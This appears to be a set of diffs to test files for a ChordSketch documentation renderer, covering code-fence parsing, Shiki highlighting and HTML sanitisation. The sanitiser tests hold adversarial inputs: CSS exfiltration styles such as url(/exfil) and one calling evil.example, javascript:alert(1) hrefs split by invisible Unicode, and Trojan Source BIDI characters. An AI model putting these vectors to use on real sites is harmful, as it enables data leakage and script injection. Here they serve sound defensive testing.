+    // Two anchor langs that MUST appear or the embed-react and
+    // chordpro-rendering tests above lose their basis.
+    expect(usages.has('tsx')).toBe(true);
+    expect(usages.has('chordpro')).toBe(true);
+  });
+
+  it('records every page that uses a given fence lang', () => {
+    // The error message in the gate lists the source paths so the
+    // maintainer can find offending fences fast. Pin that the
+    // collection actually carries that provenance.
+    const usages = collectFenceLangs();
+    const chordproSources = usages.get('chordpro') ?? [];
+    expect(chordproSources.length).toBeGreaterThanOrEqual(1);
+    expect(
+      chordproSources.every(
+        (p: string) => p.startsWith('docs/sdk/') && p.endsWith('.md'),
+      ),
+    ).toBe(true);
   });
 });

--- a/packages/playground/tests/build-docs-static.test.ts
+++ b/packages/playground/tests/build-docs-static.test.ts
@@ -16,6 +16,7 @@ import {
   findCssAssetUrl,
   hashRedirectShim,
   pageHtml,
+  parseFenceHeaders,
   validateFenceLangs,
 } from '../scripts/build-docs-static.mjs';
 
@@ -254,5 +255,47 @@ describe('assertEveryFenceLangIsLoaded', () => {
         (p: string) => p.startsWith('docs/sdk/') && p.endsWith('.md'),
       ),
     ).toBe(true);
+  });
+});
+
+describe('parseFenceHeaders (FENCE_OPEN_RE coverage)', () => {
+  it('matches backtick-fenced lang headers', () => {
+    expect(parseFenceHeaders('```tsx\nfoo\n```\n')).toEqual(['tsx']);
+  });
+
+  it('matches tilde-fenced lang headers (CommonMark §4.5)', () => {
+    // ~~~ is a valid fence delimiter and MUST be recognised — a
+    // future doc author using `~~~bash` for a recipe block must
+    // not ship un-highlighted with a green build.
+    expect(parseFenceHeaders('~~~bash\necho hi\n~~~\n')).toEqual(['bash']);
+  });
+
+  it('matches up to three leading spaces before the fence chars', () => {
+    // CommonMark allows 0–3 leading spaces on the opening fence.
+    // 4+ spaces makes it an indented code block (different
+    // construct) and MUST NOT be matched.
+    expect(parseFenceHeaders('   ```tsx\nfoo\n   ```\n')).toEqual(['tsx']);
+    expect(parseFenceHeaders('    ```tsx\nfoo\n    ```\n')).toEqual([]);
+  });
+
+  it('does NOT register prose after a closing fence as a fence lang', () => {
+    // Regression test for the round-2 bug where `\s*` between the
+    // fence chars and the lang let the regex consume the trailing
+    // newlines of a closing fence and match the first word of
+    // prose. The fix replaced `\s*` with `[ \t]*`.
+    const source = '```tsx\nfoo\n```\n\nReturns a song.\n';
+    expect(parseFenceHeaders(source)).toEqual(['tsx']);
+  });
+
+  it('ignores inline-code spans (single backticks)', () => {
+    // Single backticks are inline code, not fences. They MUST NOT
+    // contribute to the lang map. This is implicitly covered by
+    // the `{3,}` quantifier but worth pinning structurally.
+    expect(parseFenceHeaders('Use `Returns` in prose.\n')).toEqual([]);
+  });
+
+  it('returns multiple langs across multiple fences in order', () => {
+    const source = '```tsx\na\n```\n\n```bash\nb\n```\n\n~~~rust\nc\n~~~\n';
+    expect(parseFenceHeaders(source)).toEqual(['tsx', 'bash', 'rust']);
   });
 });

--- a/packages/playground/tests/build-docs-static.test.ts
+++ b/packages/playground/tests/build-docs-static.test.ts
@@ -16,6 +16,7 @@ import {
   findCssAssetUrl,
   hashRedirectShim,
   pageHtml,
+  validateFenceLangs,
 } from '../scripts/build-docs-static.mjs';
 
 const PLAYGROUND_ROOT = resolve(__dirname, '..');
@@ -173,6 +174,50 @@ describe('findCssAssetUrl', () => {
     }
     const url = findCssAssetUrl();
     expect(url).toMatch(/^\/chordsketch\/assets\/docs-[\w-]+\.css$/);
+  });
+});
+
+describe('validateFenceLangs', () => {
+  it('throws when an unsupported lang appears in the map (mutation-test anchor)', () => {
+    // Without this test the gate's core predicate
+    // (`if (resolveShikiLang(lang) === null)`) can be collapsed
+    // to `if (false)` and the build-time validator becomes a
+    // no-op — yet `assertEveryFenceLangIsLoaded` still passes on
+    // the live corpus. The synthetic input pins the predicate.
+    expect(() =>
+      validateFenceLangs(new Map([['klingon', ['docs/sdk/foo.md']]])),
+    ).toThrow(/klingon/);
+  });
+
+  it('mentions every offending source path in the error message', () => {
+    let err: unknown = null;
+    try {
+      validateFenceLangs(
+        new Map([
+          ['klingon', ['docs/sdk/a.md', 'docs/sdk/b.md']],
+          ['martian', ['docs/sdk/c.md']],
+        ]),
+      );
+    } catch (e) {
+      err = e;
+    }
+    expect(err).toBeInstanceOf(Error);
+    const msg = (err as Error).message;
+    expect(msg).toContain('docs/sdk/a.md');
+    expect(msg).toContain('docs/sdk/b.md');
+    expect(msg).toContain('docs/sdk/c.md');
+    expect(msg).toContain('SHIKI_LANGS');
+  });
+
+  it('accepts a map where every lang resolves through Shiki', () => {
+    expect(() =>
+      validateFenceLangs(
+        new Map([
+          ['tsx', ['docs/sdk/tasks/embed-react.md']],
+          ['chordpro', ['docs/sdk/tasks/render.md']],
+        ]),
+      ),
+    ).not.toThrow();
   });
 });
 

--- a/packages/playground/tests/docs-render.test.ts
+++ b/packages/playground/tests/docs-render.test.ts
@@ -522,16 +522,44 @@ describe('highlightCodeBlock', () => {
     );
   });
 
-  it('strips BIDI overrides and null bytes from the fallback path (Trojan Source)', () => {
-    // A markdown fence with an unknown lang plus embedded
-    // RTL-override / null could otherwise render visually
-    // different from its byte content (Trojan Source class).
-    // The fallback filter must drop them before HTML escaping.
-    const trojan = 'normal‮ evil';
-    const out = highlightCodeBlock(trojan, 'klingon');
-    expect(out).toContain('normalevil');
-    expect(out).not.toContain('‮');
-    expect(out).not.toContain(' ');
+  it('strips RTL-override (U+202E) from the fallback path while preserving surrounding ASCII', () => {
+    // CVE-2021-42574 / Trojan Source: U+202E reverses the visual
+    // order of following characters and has been used to make
+    // authored source bytes disagree with their rendered
+    // presentation. The fallback path must drop the override
+    // character; legitimate ASCII bytes around it must survive.
+    const input = `before\u{202E}after`;
+    const out = highlightCodeBlock(input, 'klingon');
+    expect(out).toContain('beforeafter');
+    expect(out).not.toContain('\u{202E}');
+  });
+
+  it('strips null bytes from the fallback path', () => {
+    // Null bytes inside HTML can confuse downstream tools and
+    // appear in historical sanitiser bypass chains; drop them.
+    const out = highlightCodeBlock(`a\u{0000}b`, 'klingon');
+    expect(out).toBe('<pre><code>ab</code></pre>');
+  });
+
+  it('preserves ordinary ASCII spaces in the fallback path', () => {
+    // Pins that the BIDI / null filter does NOT collateral-damage
+    // legitimate whitespace — a regression that broadened the
+    // filter to drop U+0020 would mangle every multi-word code
+    // sample on the deployed pages.
+    expect(highlightCodeBlock('hello world', 'klingon')).toBe(
+      '<pre><code>hello world</code></pre>',
+    );
+  });
+
+  it('strips variation selectors and language-tag characters', () => {
+    // Variation selectors (U+FE00– U+FE0F) and language-tag chars
+    // (U+E0000– U+E007F) render invisibly and have been used in
+    // steganography / prompt-injection vectors. Neutralise them
+    // on every path that does not need them — no legitimate
+    // ChordPro / docs-source content uses these codepoints.
+    const input = `a\u{FE0F}b\u{E0041}c`;
+    const out = highlightCodeBlock(input, 'klingon');
+    expect(out).toBe('<pre><code>abc</code></pre>');
   });
 
   it('resolves the `ts` alias and produces shiki-wrapped output', () => {
@@ -559,6 +587,21 @@ describe('highlightCodeBlock', () => {
     // pathological highlight run or silent truncation.
     const big = 'a'.repeat(257 * 1024);
     expect(() => highlightCodeBlock(big, 'tsx')).toThrow(
+      /exceeds 262144 bytes/,
+    );
+  });
+
+  it('accepts input at exactly the size cap (lower boundary)', () => {
+    // Pins the boundary so a mutation flipping `>` to `>=` is
+    // caught. Semantics: 262144-byte input passes; 262145-byte
+    // input throws.
+    const atCap = 'a'.repeat(262144);
+    expect(() => highlightCodeBlock(atCap, 'klingon')).not.toThrow();
+  });
+
+  it('throws at exactly one byte over the cap (upper boundary)', () => {
+    const overCap = 'a'.repeat(262145);
+    expect(() => highlightCodeBlock(overCap, 'klingon')).toThrow(
       /exceeds 262144 bytes/,
     );
   });
@@ -622,25 +665,102 @@ describe('renderMarkdown code-fence integration', () => {
     expect(html).not.toContain('fill:red');
   });
 
-  it('strips style on PRE/CODE/SPAN when the value contains url() (CSS exfil guard)', () => {
-    // DOMPurify treats `style` as URI-safe and does NOT apply its
-    // URI regex to CSS values. Without the explicit `url(` guard
-    // an authored span like
-    // `<span style="background-image:url(/exfil)">`
-    // would survive into deployed HTML and fire an authenticated
-    // request from every reader's browser. Test each vector
-    // individually.
+  it('strips any style on PRE/CODE/SPAN whose value does not match the Shiki allowlist', () => {
+    // Defence is a fail-closed allowlist of CSS property:value
+    // patterns Shiki actually emits. Anything else loses the
+    // entire attribute. Test the resource-loading CSS surface
+    // that motivated the allowlist:
+    //
+    // - `url(...)` — covers the canonical exfil channel; DOMPurify
+    //   treats `style` as URI-safe so the URI regex does NOT
+    //   apply to CSS values.
+    // - `image(...)` / `image-set(...)` — CSS image functions
+    //   that can initiate network requests WITHOUT containing
+    //   the substring `url(`. A `url(`-only regex would miss
+    //   these; the allowlist catches them by construction.
+    // - CSS hex escape `\28` for `(` — browsers normalise it
+    //   back to `url(` at parse time; the allowlist's strict
+    //   value pattern rejects backslash entirely.
+    // - `@import url(...)` smuggled into inline style — browsers
+    //   ignore `@import` inside `style` attributes, but the
+    //   allowlist rejects it regardless.
+    // - `var(--x)` referencing CSS custom properties — payload
+    //   surface for selector-based exfil; allowlist rejects.
+    // - Whitespace + case + punctuation variations on `url(`.
     const vectors = [
       '<span style="background-image:url(/exfil)">x</span>',
       '<span style="background:url(javascript:alert(1))">x</span>',
       '<span style="-moz-binding:url(http://evil.example/x)">x</span>',
       '<span style="behavior:url(#default)">x</span>',
-      // Whitespace + case variations in `url(`.
       '<span style="background : URL  ( /exfil )">x</span>',
+      '<span style="background-image:image(/exfil)">x</span>',
+      '<span style="background-image:image-set(\\"/exfil\\" 1x)">x</span>',
+      '<span style="background-image:cross-fade(url(/exfil) 50%)">x</span>',
+      '<span style="background-image:url\\28/exfil\\29">x</span>',
+      '<span style="background-image:url\\000028/exfil\\000029">x</span>',
+      '<span style="@import url(http://evil)">x</span>',
+      '<span style="--x:url(/exfil)">x</span>',
+      // Comment-bypass attempt (CSS allows `/* */` between tokens).
+      '<span style="background:url/* */(/exfil)">x</span>',
+    ];
+    // Match a real element opening tag with a style attribute
+    // whose value contains a dangerous token. Escaped text (e.g.
+    // `&lt;span style="..."&gt;`) is NOT a real element and does
+    // not pose a CSS exfil risk, so the regex anchors on `<word`
+    // (literal `<`) — escaped `&lt;` would not match.
+    const DANGEROUS_STYLE_RE =
+      /<\w+[^>]*\sstyle="[^"]*(?:url|image|@import|\\)[^"]*"/i;
+    for (const v of vectors) {
+      const html = renderMarkdown(`${v}\n`, 'docs/sdk/README.md');
+      // Either the span survives without ANY style attribute, or
+      // it does not survive at all — both are acceptable; the
+      // critical assertion is that no real element carries a
+      // resource-loading or escape-bearing style value.
+      expect(html, v).not.toMatch(DANGEROUS_STYLE_RE);
+    }
+  });
+
+  it('strips style values that do not match the Shiki property:value allowlist', () => {
+    // Catches "unrecognised property" mutations: a future
+    // contributor who widens the allowlist (e.g. to permit
+    // `width:` for layout shenanigans) gets a failing test on
+    // every property NOT yet allowed. The four below are
+    // properties browsers honour but Shiki never emits.
+    const vectors = [
+      '<span style="width:9999px">x</span>',
+      '<span style="position:absolute;top:0;left:0">x</span>',
+      '<span style="display:none">x</span>',
+      '<span style="opacity:0">x</span>',
     ];
     for (const v of vectors) {
       const html = renderMarkdown(`${v}\n`, 'docs/sdk/README.md');
-      expect(html, v).not.toMatch(/style=[^>]*url/i);
+      expect(html, v).not.toMatch(/<span[^>]*style=/);
+    }
+  });
+
+  it('preserves the legitimate Shiki allowlist values across themes', () => {
+    // Pins every property:value Shiki may legitimately emit so a
+    // future allowlist tightening that breaks one of them fails
+    // here, not silently in deployed output.
+    const survivors = [
+      'color:#abc',
+      'color:#ABCDEF',
+      'color:#abcdef12',
+      'background-color:#000000',
+      'font-style:italic',
+      'font-style:oblique',
+      'font-weight:bold',
+      'font-weight:700',
+      'text-decoration:underline',
+    ];
+    for (const decl of survivors) {
+      const html = renderMarkdown(
+        `<span style="${decl}">x</span>\n`,
+        'docs/sdk/README.md',
+      );
+      expect(html, decl).toMatch(
+        new RegExp(`<span[^>]*style="${decl.replace('#', '#')}"`, 'i'),
+      );
     }
   });
 

--- a/packages/playground/tests/docs-render.test.ts
+++ b/packages/playground/tests/docs-render.test.ts
@@ -375,6 +375,31 @@ describe('extractOutline depth filter', () => {
     const outline = extractOutline(source);
     expect(outline.map((e) => e.text)).toEqual(['Real', 'Other']);
   });
+
+  it('honours CommonMark closing-fence length parity (4-backtick block)', async () => {
+    // A 4-backtick fence may contain `` ``` `` as literal code
+    // because CommonMark requires the closing fence to be at
+    // least as long as the opening. A regex that closes a
+    // 4-backtick block on a 3-backtick line would over-strip,
+    // hiding a heading the rendered HTML actually contains. Pin
+    // the length-aware closing-fence behaviour.
+    const { extractOutline } = await import(
+      '../scripts/lib/docs-render.mjs'
+    );
+    const source = [
+      '## Real',
+      '',
+      '````tsx',
+      '```',
+      '## Not a heading',
+      '```',
+      '````',
+      '',
+      '## Other',
+    ].join('\n');
+    const outline = extractOutline(source);
+    expect(outline.map((e) => e.text)).toEqual(['Real', 'Other']);
+  });
 });
 
 describe('slugifyWithCounter fallback', () => {
@@ -458,6 +483,9 @@ describe('isSafeHref — adversarial parity with the Rust suite', () => {
     { label: 'soft-hyphen split', href: 'java\u00adscript:alert(1)' },
     { label: 'RTL-override split', href: 'java\u202escript:alert(1)' },
     { label: 'BOM split', href: 'java\ufeffscript:alert(1)' },
+    { label: 'Mongolian VS split', href: 'java\u180bscript:alert(1)' },
+    { label: 'variation-selector split', href: 'java\ufe0fscript:alert(1)' },
+    { label: 'lang-tag split', href: `java\u{E0041}script:alert(1)` },
     // The 30-char filter cap MUST apply to filtered characters, not
     // raw input — 50 invisible-format chars must not push
     // `javascript:` past the cap.

--- a/packages/playground/tests/docs-render.test.ts
+++ b/packages/playground/tests/docs-render.test.ts
@@ -13,6 +13,7 @@ import {
   DOC_GROUPS,
   cleanUrlFor,
   extractOutline,
+  highlightCodeBlock,
   isExternalHttpHref,
   isSafeHref,
   renderMarkdown,
@@ -425,4 +426,79 @@ describe('isSafeHref — adversarial parity with the Rust suite', () => {
       expect(isSafeHref(href)).toBe(false);
     });
   }
+});
+
+describe('highlightCodeBlock', () => {
+  it('emits a shiki-wrapped pre + per-token coloured spans for a known language', () => {
+    const html = highlightCodeBlock(
+      "import { ChordSheet } from '@chordsketch/react';",
+      'tsx',
+    );
+    expect(html.startsWith('<pre class="shiki')).toBe(true);
+    // Per-token colour spans are the load-bearing visual signal of
+    // highlighting; without them the block degrades to plain text.
+    expect(html).toMatch(/<span style="color:#[0-9A-Fa-f]{3,8}">import<\/span>/);
+    expect(html).toContain('ChordSheet');
+    // Wrapper-level inline `style` / `tabindex` are stripped so the
+    // existing `.docs-prose pre` rule keeps controlling padding /
+    // background / border-radius.
+    expect(html).not.toMatch(/<pre[^>]*\sstyle=/);
+    expect(html).not.toMatch(/<pre[^>]*\stabindex=/);
+  });
+
+  it('highlights ChordPro using the in-repo TextMate grammar', () => {
+    // `syntaxes/chordpro.tmLanguage.json` scopes `{title` as a
+    // `keyword.control.directive.chordpro` and the value as a
+    // string. Both segments MUST land in distinct coloured spans —
+    // otherwise the grammar load silently fell back to plain text.
+    const html = highlightCodeBlock('{title: Demo}', 'chordpro');
+    expect(html.startsWith('<pre class="shiki')).toBe(true);
+    expect(html).toMatch(/<span style="color:#[0-9A-Fa-f]{3,8}">title<\/span>/);
+    expect(html).toMatch(/<span style="color:#[0-9A-Fa-f]{3,8}">Demo<\/span>/);
+  });
+
+  it('falls back to plain escaped <pre><code> for an unknown language', () => {
+    expect(highlightCodeBlock('a < b && c', 'klingon')).toBe(
+      '<pre><code>a &lt; b &amp;&amp; c</code></pre>',
+    );
+  });
+
+  it('falls back to plain escaped <pre><code> when no language is set', () => {
+    expect(highlightCodeBlock('plain', '')).toBe('<pre><code>plain</code></pre>');
+  });
+
+  it('resolves the `ts` alias to typescript', () => {
+    const html = highlightCodeBlock("const x: number = 1;", 'ts');
+    expect(html.startsWith('<pre class="shiki')).toBe(true);
+    expect(html).toMatch(/<span style="color:#[0-9A-Fa-f]{3,8}">const<\/span>/);
+  });
+});
+
+describe('renderMarkdown code-fence integration', () => {
+  it('runs Shiki on a fenced TSX block and survives DOMPurify with per-span colours intact', () => {
+    // DOMPurify's HTML profile strips `style` by default. The
+    // colour-span output is the integration evidence that the
+    // PURIFY_CONFIG allowance + the SHIKI_STYLE_TAGS guard hook are
+    // both wired in; without either, the spans would survive but
+    // their `style` would not.
+    const html = renderMarkdown(
+      "```tsx\nimport { x } from 'y';\n```\n",
+      'docs/sdk/tasks/embed-react.md',
+    );
+    expect(html).toMatch(/<pre class="shiki[^"]*"><code>/);
+    expect(html).toMatch(
+      /<span style="color:#[0-9A-Fa-f]{3,8}">import<\/span>/,
+    );
+  });
+
+  it('strips a stray <div style="..."> in inline HTML even though Shiki spans keep theirs', () => {
+    // The PURIFY_CONFIG allowlist widening for Shiki MUST NOT
+    // become a general `style=` allowance on every tag — the
+    // post-sanitize hook narrows the survivors to PRE / CODE / SPAN.
+    const html = renderMarkdown(
+      '<div style="background:red">payload</div>\n',
+      'docs/sdk/README.md',
+    );
+    expect(html).not.toContain('style="background:red"');
+  });
 });

--- a/packages/playground/tests/docs-render.test.ts
+++ b/packages/playground/tests/docs-render.test.ts
@@ -649,6 +649,16 @@ describe('highlightCodeBlock', () => {
     expect(html).toMatch(COLOUR_SPAN_RE);
   });
 
+  it('highlights `js` blocks via Shiki\'s auto-loaded tsx-dep grammar', () => {
+    // `js` is NOT in `SHIKI_LANG_ALIASES`, but Shiki auto-loads it
+    // as an embedded dependency of `tsx` so `resolveShikiLang('js')`
+    // returns `'js'` directly. Pin that resolution against a future
+    // Shiki upgrade that changes the tsx → js auto-load relationship.
+    const html = highlightCodeBlock('const x = 1;', 'js');
+    expect(html.startsWith('<pre class="shiki')).toBe(true);
+    expect(html).toMatch(COLOUR_SPAN_RE);
+  });
+
   it('resolves the `sh` alias to a loaded grammar', () => {
     const html = highlightCodeBlock('echo hello', 'sh');
     expect(html.startsWith('<pre class="shiki')).toBe(true);

--- a/packages/playground/tests/docs-render.test.ts
+++ b/packages/playground/tests/docs-render.test.ts
@@ -330,6 +330,51 @@ describe('extractOutline depth filter', () => {
       '3:Detail',
     ]);
   });
+
+  it('excludes headings nested inside a ~~~ tilde-fenced code block', async () => {
+    // Sister-site to the build-time `FENCE_OPEN_RE` validator: any
+    // fence shape the validator treats as a code block MUST also
+    // be stripped here, otherwise an embedded `## heading` line
+    // ships a phantom on-page-outline entry with a broken anchor.
+    const { extractOutline } = await import(
+      '../scripts/lib/docs-render.mjs'
+    );
+    const source = [
+      '## Real heading',
+      '',
+      '~~~tsx',
+      '## Not a heading',
+      'const x = 1;',
+      '~~~',
+      '',
+      '## Another real heading',
+    ].join('\n');
+    const outline = extractOutline(source);
+    expect(outline.map((e) => e.text)).toEqual([
+      'Real heading',
+      'Another real heading',
+    ]);
+  });
+
+  it('strips 0–3-space-indented backtick fences before outline extraction', async () => {
+    // CommonMark allows the opening fence to start with up to 3
+    // leading spaces. The validator covers the same indented shape;
+    // extractOutline must too.
+    const { extractOutline } = await import(
+      '../scripts/lib/docs-render.mjs'
+    );
+    const source = [
+      '## Real',
+      '',
+      '   ```tsx',
+      '## Not a heading',
+      '   ```',
+      '',
+      '## Other',
+    ].join('\n');
+    const outline = extractOutline(source);
+    expect(outline.map((e) => e.text)).toEqual(['Real', 'Other']);
+  });
 });
 
 describe('slugifyWithCounter fallback', () => {
@@ -562,6 +607,14 @@ describe('highlightCodeBlock', () => {
     expect(out).toBe('<pre><code>abc</code></pre>');
   });
 
+  it('strips Mongolian variation selectors (U+180B-U+180D)', () => {
+    // Same invisible-format-control class as the FE / E01 ranges;
+    // present in steganography payloads against text pipelines.
+    const input = `a\u{180B}b\u{180C}c\u{180D}d`;
+    const out = highlightCodeBlock(input, 'klingon');
+    expect(out).toBe('<pre><code>abcd</code></pre>');
+  });
+
   it('resolves the `ts` alias and produces shiki-wrapped output', () => {
     const html = highlightCodeBlock('const x: number = 1;', 'ts');
     expect(html.startsWith('<pre class="shiki')).toBe(true);
@@ -702,6 +755,10 @@ describe('renderMarkdown code-fence integration', () => {
       '<span style="--x:url(/exfil)">x</span>',
       // Comment-bypass attempt (CSS allows `/* */` between tokens).
       '<span style="background:url/* */(/exfil)">x</span>',
+      // `color:` is in the allowlist but only with a strict hex
+      // value; a `url(...)` payload smuggled into the `color`
+      // property must NOT bypass the property-level check.
+      '<span style="color:url(/exfil)">x</span>',
     ];
     // Match a real element opening tag with a style attribute
     // whose value contains a dangerous token. Escaped text (e.g.
@@ -709,7 +766,7 @@ describe('renderMarkdown code-fence integration', () => {
     // not pose a CSS exfil risk, so the regex anchors on `<word`
     // (literal `<`) — escaped `&lt;` would not match.
     const DANGEROUS_STYLE_RE =
-      /<\w+[^>]*\sstyle="[^"]*(?:url|image|@import|\\)[^"]*"/i;
+      /<\w+[^>]*\sstyle="[^"]*(?:url|image|cross-fade|@import|\\)[^"]*"/i;
     for (const v of vectors) {
       const html = renderMarkdown(`${v}\n`, 'docs/sdk/README.md');
       // Either the span survives without ANY style attribute, or
@@ -744,6 +801,7 @@ describe('renderMarkdown code-fence integration', () => {
     // here, not silently in deployed output.
     const survivors = [
       'color:#abc',
+      'color:#abcd',
       'color:#ABCDEF',
       'color:#abcdef12',
       'background-color:#000000',
@@ -752,6 +810,10 @@ describe('renderMarkdown code-fence integration', () => {
       'font-weight:bold',
       'font-weight:700',
       'text-decoration:underline',
+      // Shiki's core renderer joins multiple decoration bits with
+      // a space when a token carries both (e.g. underline +
+      // strikethrough). The allowlist must accept that.
+      'text-decoration:underline line-through',
     ];
     for (const decl of survivors) {
       const html = renderMarkdown(
@@ -761,6 +823,49 @@ describe('renderMarkdown code-fence integration', () => {
       expect(html, decl).toMatch(
         new RegExp(`<span[^>]*style="${decl.replace('#', '#')}"`, 'i'),
       );
+    }
+  });
+
+  it('preserves a multi-declaration Shiki style value (split path)', () => {
+    // Without a multi-decl positive case, a mutation that drops
+    // the `split(';')` in `isLegitimateShikiStyle` (treating the
+    // whole value as one declaration) is uncaught: every
+    // single-decl survivor still matches under both code paths,
+    // but a real Shiki output like `color:#fff;font-style:italic`
+    // would be stripped entirely. Pin the split path here.
+    const html = renderMarkdown(
+      '<span style="color:#abc;font-style:italic">x</span>\n',
+      'docs/sdk/README.md',
+    );
+    expect(html).toMatch(
+      /<span[^>]*style="color:#abc;font-style:italic"/i,
+    );
+  });
+
+  it('strips an invalid declaration even when paired with a valid one', () => {
+    // Multi-decl values must be validated declaration-by-
+    // declaration; a single bad entry in a `;`-separated list
+    // contaminates the whole attribute. Mutation guard: a future
+    // change that bypasses the per-decl loop and only checks the
+    // first decl would let `;background:url(/exfil)` through.
+    const html = renderMarkdown(
+      '<span style="color:#abc;background-image:url(/exfil)">x</span>\n',
+      'docs/sdk/README.md',
+    );
+    expect(html).not.toMatch(/<span[^>]*\sstyle=/);
+  });
+
+  it('strips 5- and 7-digit hex colour values (invalid CSS widths)', () => {
+    // CSS hex colours are exactly 3, 4, 6, or 8 digits. 5- and
+    // 7-digit values browsers ignore as malformed, but the
+    // allowlist nonetheless rejects them so the deployed HTML
+    // never carries CSS the browser cannot use.
+    for (const decl of ['color:#12345', 'color:#1234567']) {
+      const html = renderMarkdown(
+        `<span style="${decl}">x</span>\n`,
+        'docs/sdk/README.md',
+      );
+      expect(html, decl).not.toMatch(/<span[^>]*\sstyle=/);
     }
   });
 

--- a/packages/playground/tests/docs-render.test.ts
+++ b/packages/playground/tests/docs-render.test.ts
@@ -428,6 +428,13 @@ describe('isSafeHref — adversarial parity with the Rust suite', () => {
   }
 });
 
+// Hex colour widths emitted by Shiki are 3 / 4 / 6 / 8 — anything
+// else is invalid CSS. Pin the regex tightly so a future Shiki
+// release emitting a malformed colour fails the assertion instead
+// of slipping through a permissive `{3,8}` window.
+const HEX_COLOUR = /#(?:[0-9A-Fa-f]{3,4}|[0-9A-Fa-f]{6}|[0-9A-Fa-f]{8})/;
+const COLOUR_SPAN_RE = new RegExp(`<span style="color:${HEX_COLOUR.source}">`);
+
 describe('highlightCodeBlock', () => {
   it('emits a shiki-wrapped pre + per-token coloured spans for a known language', () => {
     const html = highlightCodeBlock(
@@ -435,15 +442,50 @@ describe('highlightCodeBlock', () => {
       'tsx',
     );
     expect(html.startsWith('<pre class="shiki')).toBe(true);
-    // Per-token colour spans are the load-bearing visual signal of
-    // highlighting; without them the block degrades to plain text.
-    expect(html).toMatch(/<span style="color:#[0-9A-Fa-f]{3,8}">import<\/span>/);
+    expect(html).toMatch(COLOUR_SPAN_RE);
     expect(html).toContain('ChordSheet');
-    // Wrapper-level inline `style` / `tabindex` are stripped so the
-    // existing `.docs-prose pre` rule keeps controlling padding /
-    // background / border-radius.
+    // Wrapper-level presentation attrs (Shiki's `style`,
+    // `tabindex`, and any future ones the `stripPreWrapper`
+    // allowlist drops) must be absent so the existing `.docs-prose
+    // pre` CSS rule keeps controlling background / padding / radius.
     expect(html).not.toMatch(/<pre[^>]*\sstyle=/);
     expect(html).not.toMatch(/<pre[^>]*\stabindex=/);
+  });
+
+  it('preserves tokenisation boundaries: keyword and string land in distinct coloured spans', () => {
+    // A regression that collapses all tokens into a single coloured
+    // span would still satisfy the "<span color> import </span>"
+    // assertion above. Asserting that distinct token classes land
+    // in *different* colour values catches that mutation.
+    const html = highlightCodeBlock(
+      "import { ChordSheet } from '@chordsketch/react';",
+      'tsx',
+    );
+    const importMatch = html.match(
+      new RegExp(`<span style="color:(${HEX_COLOUR.source})">import</span>`),
+    );
+    // Shiki preserves the leading whitespace inside the string span
+    // (` '@chordsketch/react'`), so the regex tolerates leading spaces.
+    const stringMatch = html.match(
+      new RegExp(
+        `<span style="color:(${HEX_COLOUR.source})">\\s*'@chordsketch/react'</span>`,
+      ),
+    );
+    expect(importMatch?.[1]).toBeDefined();
+    expect(stringMatch?.[1]).toBeDefined();
+    expect(importMatch![1].toLowerCase()).not.toBe(
+      stringMatch![1].toLowerCase(),
+    );
+  });
+
+  it('wraps each source line in a <span class="line"> structural marker', () => {
+    // Pinning the per-line wrapper structurally lets future
+    // features (copy button, line numbers, gutter scrolling) hang
+    // off a stable class name. Regression: a Shiki option flip
+    // that drops the wrapper would silently break them.
+    const html = highlightCodeBlock('const a = 1;\nconst b = 2;', 'tsx');
+    const matches = html.match(/<span class="line">/g);
+    expect(matches?.length).toBe(2);
   });
 
   it('highlights ChordPro using the in-repo TextMate grammar', () => {
@@ -453,8 +495,12 @@ describe('highlightCodeBlock', () => {
     // otherwise the grammar load silently fell back to plain text.
     const html = highlightCodeBlock('{title: Demo}', 'chordpro');
     expect(html.startsWith('<pre class="shiki')).toBe(true);
-    expect(html).toMatch(/<span style="color:#[0-9A-Fa-f]{3,8}">title<\/span>/);
-    expect(html).toMatch(/<span style="color:#[0-9A-Fa-f]{3,8}">Demo<\/span>/);
+    expect(html).toMatch(
+      new RegExp(`<span style="color:${HEX_COLOUR.source}">title</span>`),
+    );
+    expect(html).toMatch(
+      new RegExp(`<span style="color:${HEX_COLOUR.source}">Demo</span>`),
+    );
   });
 
   it('falls back to plain escaped <pre><code> for an unknown language', () => {
@@ -467,10 +513,54 @@ describe('highlightCodeBlock', () => {
     expect(highlightCodeBlock('plain', '')).toBe('<pre><code>plain</code></pre>');
   });
 
-  it('resolves the `ts` alias to typescript', () => {
-    const html = highlightCodeBlock("const x: number = 1;", 'ts');
+  it('escapes every HTML special char in the unknown-lang fallback', () => {
+    // The five-char minimum is the OWASP HTML-encoding baseline.
+    // A regression on any one of these would let an authored
+    // markdown source smuggle bytes into the deployed HTML.
+    expect(highlightCodeBlock(`&<>"'`, 'klingon')).toBe(
+      `<pre><code>&amp;&lt;&gt;&quot;&#39;</code></pre>`,
+    );
+  });
+
+  it('strips BIDI overrides and null bytes from the fallback path (Trojan Source)', () => {
+    // A markdown fence with an unknown lang plus embedded
+    // RTL-override / null could otherwise render visually
+    // different from its byte content (Trojan Source class).
+    // The fallback filter must drop them before HTML escaping.
+    const trojan = 'normal‮ evil';
+    const out = highlightCodeBlock(trojan, 'klingon');
+    expect(out).toContain('normalevil');
+    expect(out).not.toContain('‮');
+    expect(out).not.toContain(' ');
+  });
+
+  it('resolves the `ts` alias and produces shiki-wrapped output', () => {
+    const html = highlightCodeBlock('const x: number = 1;', 'ts');
     expect(html.startsWith('<pre class="shiki')).toBe(true);
-    expect(html).toMatch(/<span style="color:#[0-9A-Fa-f]{3,8}">const<\/span>/);
+    expect(html).toMatch(COLOUR_SPAN_RE);
+  });
+
+  it('resolves the `sh` alias to a loaded grammar', () => {
+    const html = highlightCodeBlock('echo hello', 'sh');
+    expect(html.startsWith('<pre class="shiki')).toBe(true);
+    expect(html).toMatch(COLOUR_SPAN_RE);
+  });
+
+  it('resolves the `shellscript` alias to a loaded grammar', () => {
+    const html = highlightCodeBlock('echo hello', 'shellscript');
+    expect(html.startsWith('<pre class="shiki')).toBe(true);
+    expect(html).toMatch(COLOUR_SPAN_RE);
+  });
+
+  it('throws when the input exceeds the documented size cap', () => {
+    // Inputs come from in-repo markdown fences; an input over the
+    // cap is a contract violation (machine-generated doc, embedded
+    // binary, …). Surfacing it as a build error is preferable to a
+    // pathological highlight run or silent truncation.
+    const big = 'a'.repeat(257 * 1024);
+    expect(() => highlightCodeBlock(big, 'tsx')).toThrow(
+      /exceeds 262144 bytes/,
+    );
   });
 });
 
@@ -486,19 +576,83 @@ describe('renderMarkdown code-fence integration', () => {
       'docs/sdk/tasks/embed-react.md',
     );
     expect(html).toMatch(/<pre class="shiki[^"]*"><code>/);
-    expect(html).toMatch(
